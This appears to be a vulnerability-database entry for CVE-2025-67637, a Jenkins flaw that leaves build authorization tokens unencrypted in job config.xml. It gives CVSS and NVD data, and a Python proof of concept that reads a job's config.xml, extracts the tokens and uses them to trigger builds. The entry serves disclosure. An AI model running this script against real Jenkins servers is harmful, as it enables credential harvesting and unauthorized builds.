Security Vulnerability Report
CVE-2025-67637 CVSS 4.3 MEDIUM

CVE-2025-67637

Published: 2025-12-10 17:15:56
Last Modified: 2025-12-17 17:39:11

Description

Jenkins 2.540 and earlier, LTS 2.528.2 and earlier stores build authorization tokens unencrypted in job config.xml files on the Jenkins controller where they can be viewed by users with Item/Extended Read permission or access to the Jenkins controller file system.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:jenkins:jenkins:*:*:*:*:lts:*:*:* - VULNERABLE
cpe:2.3:a:jenkins:jenkins:*:*:*:*:-:*:*:* - VULNERABLE
Jenkins <= 2.540 (weekly; the CPE range below ends before 2.541)
Jenkins LTS <= 2.528.2 (the CPE range below ends before 2.528.3)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
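# CVE-2025-67637 PoC - Jenkins Build Authorization Token Extraction
# This PoC demonstrates how to extract unencrypted build authorization tokens from Jenkins config.xml
import requests
from xml.etree import ElementTree as ET
import sys

# Upper bound (seconds) on every HTTP call so an unresponsive controller
# cannot hang the check indefinitely.
REQUEST_TIMEOUT = 10


def _redact(token):
    """Return a printable stand-in for *token* that does not reveal its value."""
    return f"<redacted, {len(token)} chars>"


def extract_jenkins_tokens(jenkins_url, job_name, username=None):
    """
    Extract build authorization tokens from Jenkins job config.xml

    Fetches ``{jenkins_url}/job/{job_name}/config.xml`` and collects the text
    of every ``authorizationToken`` element found in the returned XML.

    Args:
        jenkins_url: Base URL of the Jenkins controller, without a trailing slash.
        job_name: Name of the job whose configuration is read. It is inserted
            into the URL path as-is (no URL-encoding is applied).
        username: Optional account name. When given, HTTP basic auth is sent
            with this name and an empty password.

    Returns:
        A list of non-empty token strings. The list is empty when the request
        fails, the status is not 200, the body is not well-formed XML, or no
        token element is present.
    """
    # Method 1: Via Jenkins Web Interface with Item/Extended Read permission
    config_url = f"{jenkins_url}/job/{job_name}/config.xml"
    headers = {'Accept': 'application/xml'}

    # NOTE(review): only a username is accepted, so basic auth goes out with an
    # empty password; auth=None is what requests uses when no auth is passed.
    auth = (username, '') if username else None

    try:
        response = requests.get(
            config_url, headers=headers, auth=auth, timeout=REQUEST_TIMEOUT
        )
    except requests.RequestException as exc:
        print(f"[-] Failed to access config.xml: {type(exc).__name__}")
        return []

    if response.status_code != 200:
        print(f"[-] Failed to access config.xml: HTTP {response.status_code}")
        return []

    # The body comes from a remote server and is parsed with the stdlib parser,
    # which is not hardened against maliciously constructed XML. A 200 response
    # can also be an HTML page rather than config.xml, so treat a parse failure
    # as "nothing found" instead of crashing.
    try:
        root = ET.fromstring(response.content)
    except ET.ParseError as exc:
        print(f"[-] config.xml response is not well-formed XML: {exc}")
        return []

    # NOTE(review): the element name is the one this PoC assumes; confirm it
    # against a config.xml from your own controller before relying on an empty
    # result as proof that no token is stored.
    return [node.text for node in root.iter('authorizationToken') if node.text]


def trigger_build_with_token(jenkins_url, job_name, token):
    """
    Trigger Jenkins build using extracted authorization token

    Sends a POST to ``{jenkins_url}/job/{job_name}/build`` with the token as
    the ``token`` query parameter and prints whether the response status was
    200, 201 or 302. Returns None.
    """
    build_url = f"{jenkins_url}/job/{job_name}/build"

    try:
        response = requests.post(
            build_url, params={'token': token}, timeout=REQUEST_TIMEOUT
        )
    except requests.RequestException as exc:
        # Print only the exception type: the message can embed the request URL,
        # and the URL carries the token in its query string.
        print(f"[-] Build trigger failed: {type(exc).__name__}")
        return

    if response.status_code in (200, 201, 302):
        print("[+] Build triggered successfully with token")
    else:
        print(f"[-] Build trigger failed: HTTP {response.status_code}")


# Example usage
if __name__ == "__main__":
    jenkins_url = "http://jenkins-server:8080"
    job_name = "example-job"

    print(f"[*] Extracting tokens from {jenkins_url}/job/{job_name}/config.xml")
    tokens = extract_jenkins_tokens(jenkins_url, job_name)

    if tokens:
        print(f"[+] Found {len(tokens)} authorization token(s):")
        for i, token in enumerate(tokens, 1):
            # Report that a token is present without copying the secret into
            # terminal scrollback or captured logs.
            print(f"    Token {i}: {_redact(token)}")
            # Attempt to trigger build
            trigger_build_with_token(jenkins_url, job_name, token)
    else:
        print("[-] No authorization tokens found")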

References

https://www.jenkins.io/security/advisory/2025-12-10/#SECURITY-783 (Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-67637", "sourceIdentifier": "[email protected]", "published": "2025-12-10T17:15:56.180", "lastModified": "2025-12-17T17:39:11.063", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Jenkins 2.540 and earlier, LTS 2.528.2 and earlier stores build authorization tokens unencrypted in job config.xml files on the Jenkins controller where they can be viewed by users with Item/Extended Read permission or access to the Jenkins controller file system."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-312"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:jenkins:jenkins:*:*:*:*:lts:*:*:*", "versionEndExcluding": "2.528.3", "matchCriteriaId": "A276E9FE-7CB8-4B6B-A399-14C0E7B10BC4"}, {"vulnerable": true, "criteria": "cpe:2.3:a:jenkins:jenkins:*:*:*:*:-:*:*:*", "versionEndExcluding": "2.541", "matchCriteriaId": "F2388D03-0340-4C73-97B7-FB06AB6E972B"}]}]}], "references": [{"url": "https://www.jenkins.io/security/advisory/2025-12-10/#SECURITY-783", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}